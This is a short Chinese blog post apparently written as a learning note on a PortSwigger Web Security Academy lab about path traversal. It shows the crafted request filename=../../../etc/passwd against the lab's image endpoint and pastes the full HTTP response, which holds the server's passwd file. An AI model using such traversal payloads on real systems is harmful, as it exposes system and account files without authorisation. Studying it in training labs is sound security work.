来自bp的学院,提供了靶机,是个学习好地方
服务器漏洞之路径遍历
就是说网站提供的图片,如果直接通过src="/loadImage?filename=xxx.jpg“读取的话,可以通过构造 ”filename=../../../etc/passwd"参数,拿到服务器的passwd文件,这样能读取服务器的用户
放一个靶机地址:https://portswigger.net/web-security/learning-paths/server-side-vulnerabilities-apprentice/path-traversal-apprentice/file-path-traversal/lab-simple#
按照教程,找到图片加载的地址,构造请求地址:https://0af600c50370bec8851f5f9900f8009d.web-security-academy.net/image?filename=../../../etc/passwd
奇怪的是这个地址通过浏览器打开加载不到任何东西
推测是响应头中声明了是个image,所以浏览器按照image解析了。在bp中就可以看到响应
把整个响应贴到这
HTTP/2 200 OK Content-Type: image/jpeg X-Frame-Options: SAMEORIGIN Content-Length: 2316 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin peter:x:12001:12001::/home/peter:/bin/bash carlos:x:12002:12002::/home/carlos:/bin/bash user:x:12000:12000::/home/user:/bin/bash elmer:x:12099:12099::/home/elmer:/bin/bash academy:x:10000:10000::/academy:/bin/bash messagebus:x:101:101::/nonexistent:/usr/sbin/nologin dnsmasq:x:102:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin systemd-timesync:x:103:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:104:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:105:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin mysql:x:106:107:MySQL Server,,,:/nonexistent:/bin/false postgres:x:107:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin mongodb:x:110:117::/var/lib/mongodb:/usr/sbin/nologin avahi:x:111:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin cups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin geoclue:x:113:120::/var/lib/geoclue:/usr/sbin/nologin saned:x:114:122::/var/lib/saned:/usr/sbin/nologin colord:x:115:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin pulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin gdm:x:117:126:Gnome Display Manager:/var/lib/gdm3:/bin/falseView Code 标签:bin,sbin,vulnerabilities,nologin,systemd,traversal,usr,var,path From: https://www.cnblogs.com/superxuezhazha/p/18180226